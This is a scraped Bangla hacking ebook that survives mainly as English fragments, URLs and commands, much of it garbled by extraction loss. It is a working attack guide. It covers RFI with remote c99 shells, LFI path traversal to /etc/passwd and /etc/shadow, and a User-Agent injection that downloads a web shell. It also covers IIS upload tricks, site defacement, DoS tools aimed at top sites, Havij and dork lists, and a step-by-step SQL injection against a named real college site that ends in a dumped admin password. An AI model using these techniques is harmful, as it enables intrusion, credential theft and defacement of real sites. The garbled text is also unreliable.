Professional Documents
Culture Documents
Hacking Bangla Ebook
Hacking Bangla Ebook
Hacking Bangla Ebook
Jack nax
Cyan Tarek
pirate_king
Log Out
Shojib
Niloy
, -
,
-
,
www.fb.com/md.faroqueahmed
/
-
(
)
,
( ) ( )
,
:
/
:
(
)
www.hackerthreads.orgwww.hackforums.netwww.hacker.org/forumwww.crackhackforum.com
:
, , ,
http://www.ethicalhacker.net/http://insecure.org/http://hacker.resourcez.com/http://www.certifiedethicalhacker.
com/http://www.elitehack.net/http://www.elite-hackers.com/http://www.exploitdb.com/http://www.1337day.com/http://www.breakthesecurity.com/http://www.thehackerslibrary.com/http://w
ww.port7alliance.com/http://www.hackers.nl/http://hackmein.tripod.com/http://kyrionhackingtutorials.com/http
://www.hackinggurus.net/http://hackmyass.wordpress.com/http://www.borntohack.in/http://www.criticalsecurity.net/http://ww
w.mpgh.net/http://www.duniapassword.com/http://www.progamercity.net/
TRON (1982), THE GIRL WITH THE DRAGON TATTOO (2009), WARGAMES (1983), DIE HARD
4:LIVE FREE OR DIE HARD (2007), SNEAKERS (1992), THE MATRIX (1999), EXISTENZ (1999), THE
CONVERSATION (1974), THE SCORE (2001), FOOLPROOF (2003), HACKER (1995), ANTITRUST
(2001), PIRATES OFSILICONVALLEY(1999), THE LAWNMOWER MAN (1992), THE CORE (2003),
VIRTUOSITY (1995), TAKEDOWN (2000), DEJA VU (2006), ONE POINT O (2004), REVOLUTION OS
(2001), THE NET (1995), TRON : LEGACY (2010), THE ITALIAN JOB (2003), DISCLOSURE (1994),
JURASSICPARK(1993), SWORDFISH (2001), THE THIRTEENTH FLOOR (1999), UNTRACEABLE
(2008), GAMER (2009)
?
IP Address ??
IP Address ? IP Address Internet ProtocolAddress Network-
Device- Communication- Internet Protocol IP Address
Unique, IP Address
IP Address Network Internet ServiceProvider-
Internet IPAddress-
IP Address- ? IP Address-
1.Host Network Interface , Communication
2.Network IP Address ,
Network IPAddress- IP Adderss-
Binary Number, ( )
IP Address- Version
Start->Run-> cmd -
netstat n
:
www.whatismyip.com
ftp->21smtp>25dns->53http>80https->81pop3->110telnet>23
Start->Run-> cmd -
tracert websitename
:
(
)
tracert yahoo.com
( )
,
- :
,
?
nslookup
You are now authentized to this route
,
www.samspade.comwww.dnsstuff.comwww.whois.net www.who.is
, , , , ,
,
:
Reply- Show original
gmail
?
gmail https
http Hyper Text Transfer Protocol. https http secured
(, , )
http://readnotify.com/
victimsemailid.rednotify.com
http://www.didtheyreadit.com/
http://www.pointofmail.com/
:
http://www.ip2location.com/
:
?
netstat -n ?
, ,
: ICQ Messenger,
MSN Messenger, Yahoo Messenger, Gtalk, Meebo, Gigsby, AIM
?
- ICQ Messenger
ICQ Messenger (-> ->)
Start->Run->cmd->netstat -n
Start->Run->cmd>netstat -n
-
.::: Yahoo Messenger, MSN Messenger, GTalk Messenger :::.
(-- ) -
,
(
)
,
-
,
,
?
-
.::: Meebo, Gigsby, Trillion :::.
- ( - )
Forget password
,
, ?
,
,
Forget password
,
, ?
,
, ,
>impersonation
>posing as imp. user
>3rd person approach
>technical support
:
>mail/im attachments
>pop up windows
>sweepstakes
>spam mail
-
vulnerable ? ? , ?
.
http://www.targetsite.com/index.php?page=Anything
,
? ?
inurl:index.php?page=
index.php?page= ,
vulnerable ?
http://www.targetsite.com/index.php?page=www.google.com
http://www.cbspk.com/
vulnerable .
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
RFI
c99 shell
c99 shell
-ripway.com, 110mb.com
Shells ,
r57 shell
ripway.com
http://h1.ripway.com/tjunselected/c99shell.php?
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
, ?
XSS ?
XSS XSS ? Cross site Scripting
XSS CSS(Cascading Style sheet) Web
Application Vulnerability vulnerability
client side scripts ( Javascript) vulnerability
malicious codes, malware attack, phishing inject
http://3.bp.blogspot.com/_lBoKsfWMhbE/TLYDr8vQmTI/AAAAAAAAAAM/V1wVWY0GB70/s1600/
xss-threat3.jpg
Vulnerable
: Vulnerability
, Vulnerability
parameter ?
,
search query, username, password.
Vulnerability
: injection
malcious script ,
malcious script
http://2.bp.blogspot.com/8z5CXuZZpeg/TpgBgtdbdBI/AAAAAAAAAsE/qCTc_dxniWE/s1600/search+box.jpg
: URL injection
URL htp://vulnerablewebsite/search?q=malicious_script_goes_here
input fields
http://vulnerablewebsite/search?q=
: Malicious Scripts
Vulnerability , malicious scripts
cookies malware attack
cookie stealing script malicious script url
http://attackerSite/malicious.js
Persistent XSS:
XSS vulnerability.
malicious script injection ,
malicious script injection , -
, search query
XSS permanent storage.
Non-Persistent XSS:
Reflected XSS malicious script
,
injection ,
-
malicious code temporarily .
Vulnerability ?
Bypassing restriction
Session Hijacking
Malware Attack
Website Defacement
Dos attacks
,
,
,
LFI!
Local File Inclusion.
- LFI Injection
PHP
$page=$_GET[page];
include($page);
?>
php
$page sanitized
LFI
,
www.mywebsite.com/index.php?page=products.php
, ,
, URL
www.mywebsite.com/index.php?page=mypage.php
, mypage.php
, vulnerable
unix server , etc/passwd
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
../
www.mywebsite.com/index.php?page=products
,
.php
?page=products
.php
$page=$_GET[page];
include($page.php);
?>
null extension
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
, passwd file
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
------------------------------------------------------------------------------------------
.::::: :::::.
Requirements:
http://www.filllpg.co.uk/index.php?page=contacts.php
: http://4.bp.blogspot.com/-fh7-99XttP4/TocL11IQMjI/AAAAAAAAANM/gzecxiOXVFA/s400/1.JPG
: http://3.bp.blogspot.com/-WD_WKG02RTQ/TocL5ww6j5I/AAAAAAAAANQ/WM_jJ7BPEaI/s400/2.JPG
, Description
User-Agent User-Agent Tools
> Default User Agent > PHP Info
: http://2.bp.blogspot.com/kpML0wTbmOY/UKBV_gC2FTI/AAAAAAAAAoE/PpFQMVpKzbU/s1600/6.JPG
Ctrl+F
disable_functions
disable_functions
| no value
| no value
User-Agent
Edit
User-Agent
http://www.sh3ll.org/egy.txt -O shell.php');?>[
?
.txt File --> Save as
shell.php ]
http://www.site.com/shell.php
: http://3.bp.blogspot.com/SRkz9h0d8so/UKBWLQD1FMI/AAAAAAAAAoM/lpGNG1UgYMs/s1600/7.JPG
LFI http://pastebin.ca/2385927
http://www.youtube.com/watch?v=FP229bKm5v4
http://www.youtube.com/watch?v=9W9qWAhwaTo
http://www.youtube.com/watch?v=hMguilRsteY
-
,
?
IIS(IIS=The Internet Information Server Attack)
.Run
%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{BDEADF00-C265-11d0-BCED00A0C90AB50F}
Enter
. WEB FOLDER
>> >>
IIS Exploit ? ?
IIS Exploit , icon smile IIS Exploit
My Computer Add a network Location
Next
Next
http://i1085.photobucket.com/albums/j431/powerin10/no3.jpg
http://www.myxixia.com/
Next
Finish
shell
www.ziddu.com/download/16498227/shell.zip.html
Extract
Power.asp;.jpg
power.asp;.jpg
power.asp;.jpg
http://www.myxixia.com/power.asp;.jpg
index.asp
deface html
open with notepad
index.asp
: http://www.youtube.com/watch?v=iG-cjssooVg&feature=related
. javascript:__doPostBack(ctlURL$cmdUpload,)
- -DdoS ? DdoS ?
DdoS ?
DoS ? DDoS DoS ?
DoS Denial of Service DoS [
] [ ] [ ] TCP / UDP
?
, !
Denial of Service !
DDoS Distributed Denial of Service
!
- ?
DDoS
DoS DDoS !
? :S ?
DoS DDoS
DoS
DDoS
) :
, !
!
) sysadmin
DoS / DDoS ?
DoS / DDoS ) )
, ,
----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DdoS ? DdoS ? DdoS ?
Ddos
DdoS /
!
http://uptime.netcraft.com
Apache/1.3.27 ( Unix)
Apache 1.x
Apache 2.x
GoAhead WebServer
----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DoS ? DoS ?
,
,
Extract
http://www.mediafire.com/?famiivi799a9459
Run as
administrator
. URL
( ,
http://www.alexa.com/topsites/ , ,
)
. "lock on"
. "http"
.Threads 1000
-----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DoS / DDoS ?
/ ,
) ! CMD
netstat -ntu | awk {print $5} | cut -d: -f1 | sort | uniq -c | sort -n
+
icon sad
.. .. ..
APF firewall CMD
apf -d xx.xx.xx.xx
CSF firewall
csf -d xx.xx.xx.xx
, iptables
iptables -I INPUT 1 -s -j DROP xx.xx.xx.xx
xx.xx.xx.xx
/
, !
, ,
!
,
Microsoft Knowledge Base (KB)
150543
http://support.microsoft.com/default.aspx?scid=kb;en-us;150543&sd=tech
!
http://www.symantec.com/index.jsp
http://www.symantec.com/index.jsp
http://www.zonealarm.com/
http://www.comodo.com/
Havij
SQLi
Download
.Havij 1.5 Pro : http://www.mediafire.com/?s7a89dxmfwxcyij
Google.Com
"inurl:php?id="
Dork : http://pastebin.com/DvnHxg7i
2,010,000,000 (0.23 )
, php?id=
http://www.paulprescott.com/theme.php?id=10
ID=XX, XX
ID=10
( )
Error , , inject
Havij
Error Analyze ( )
Tables tab
Get DBs
paul_third, information_schema
information_schema MySQL
paul_third
Get Tables
administration panel
admin table
,
Get Columns
id, username ( Username ) password ( Password
), email ( )
Get Data
Username, Password
Find Admin
Administration Panel login
administration panel
.php?id=XX
SQL INJECT
!
SQL INJECT
dork use !
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
dork sql !
8500 SQL dorks list
http://pastebin.com/dzknXjgP
or
http://pastebin.com/ayV6tNS2
dork www.google.com SEARCH !
inurl:news-and-events.php?id=
dork SEARCH
:
http://www.eastodissa.ac.in/news-and-events.php?id=22
SQL INJECT ID
injectable
url
http://www.eastodissa.ac.in/news-and-events.php?id=22'
injectable
: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near at line 1
injectable inject
http://www.eastodissa.ac.in/news-and-events.php?id=22
, +order+by+
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+
+ 1
1
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1- ,
2
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2-
,
3,4,5 7
8 SQL
(
www.site.com/index.php?id=1 order 999 [ no error ]
order by 999 error
+ id=1 sign
www.site.com/index.php?id=1 order by 999+
error
SQL Injection )
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8-
Could not connect to MySQL server: Unknown column 8 in order clause
7
7
+union+select+1,2,3,4,5,6,7-
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7-
( , news-and-events.php?id= (
2,3,
2
2 @@version
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7-
5.1.68-community
5 inject
group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schem
a=database()--
est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplicatio
n,est_placementrecord
est_achievement , est_companyrecord
est_admin
group_concat(column_name)
+from information_schema.columns where table_name=
CHAR
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
F9
SQL>MySQL>MySQL CHAR()
ok
est_admin CHAR CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=CH
AR(101, 115, 116, 95, 97, 100, 109, 105, 110)-
=
est_admin CHAR
uid,userid,password,emailid,signature,last_login
group_concat(login,0x3a,Pass,0x3a),
userId login userId
Pass password
+from+est_admin--
+from+ est_admin est_admin
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--
trustadmin:isti$$9!5!2013:
: trustadmin
: isti$$9!5!2013
-http://scan.subhashdasyam.com/admin-panel-finder.php
havij
MD5 www.md5decrypter.cu.uk/
http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player
shell LiveHTTPHeaders
Mozilla Firox
https://addons.mozilla.org/en/firefox/addon/live-http-headers/
shell
i-47 shell
http://www.pastebucket.com/19852
or
www.mediafire.com/?64fjdlvzo9zhrra
shell username and password
username: I-47
password: I-47
47.php.jpg (
jpg
47.php.jpg
Live HTTP Headers addon
/save click
47.php.jpg
Reply
shell.php.jpg shell.php
Reply
www.site.com/gallery/37473.jpg
37473.jpg 47.php
www.site.com/gallery/47.php
Video Tutorial :
http://www.youtube.com/watch?v=xSl13HrQHZg&feature=youtu.be
3xtr3m3 H4ck3r
- http://i1114.photobucket.com/albums/k528/rakibulhasan09/Hacker1.gif
- Generate
- Copy
File>Save
as .txt .html All files
Simple Demo - http://pastehtml.com/view/bonelu59o.html
- X3N4X
Enable All
Add
Create Defacement
HTML
Simple Demo - http://pastehtml.com/view/bonexk664.html
HTML
Collection -bcaware
http://www.tunerpage.com/archives/78980
http://www.tunerpage.com/archives/98804
http://www.tunerpage.com/archives/219088
http://www.tunerpage.com/archives/224434
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
1. -
2 .Collection
http://www.facebook.com/download/290805637728289/Collection%20of%20Important%2
0Programming%20Languages%20E.rar
3 .Collection
www.facebook.com/md.faroqueahmed
Mystrious Tusin
www.facebook.com/cyb3rc0d3